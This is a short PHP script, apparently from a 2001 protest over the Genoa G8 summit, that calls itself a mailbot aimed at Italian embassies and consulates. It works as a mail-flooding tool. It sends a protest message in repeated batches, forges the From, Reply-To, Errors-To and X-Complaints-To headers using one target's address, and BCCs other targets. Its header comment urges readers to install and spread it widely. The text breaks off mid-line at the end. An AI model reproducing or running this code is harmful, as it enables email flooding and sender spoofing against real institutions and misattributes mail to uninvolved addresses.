/* this is a php mailbot targeted at italian embassies and consulates the file "mailbot.txt" has to be installed in the same directory please install, modify, publish and distribute this bot widely its original url is: http://excess4all.com/genoa/mailbot.php if you like check for e-mail addresses that produce errors */ $seconds_per_turn = 15; $mails_per_turn = 15; $to = ""; $subject = "re: Genoa"; $body = "During the G8 Summit in Genoa, Italian Paramilitary Police has killed Carlo Giuliani, seriously injured hundreds of other activists and brutally raided the Genoa Independent Media Center and the Genoa Social Forum.\n I demand that the Fascist Italian Government resigns immediately!"; srand(time()); $mail = file("mailbot.txt"); for ($i = 0; $i < count($mail); $i++) { $mail[$i] = chop($mail[$i]); $random[$i] = rand() / getrandmax(); } asort($random); $j = 0; while (list($i, $v) = each($random)) { if ($j == 0) $headers .= "From: {$mail[$i]}\nReply-To: {$mail[$i]}\nErrors-To: {$mail[$i]}\nX-Complaints-To: {$mail[$i]}\nBcc: "; else if ($j <= $mails_per_turn) { $headers .= $mail[$i]; if ($j < $mails_per_turn) $headers .= ", "; } else break; $j++; } $sent = mail($to, $subject, $body, $headers); echo ""; echo "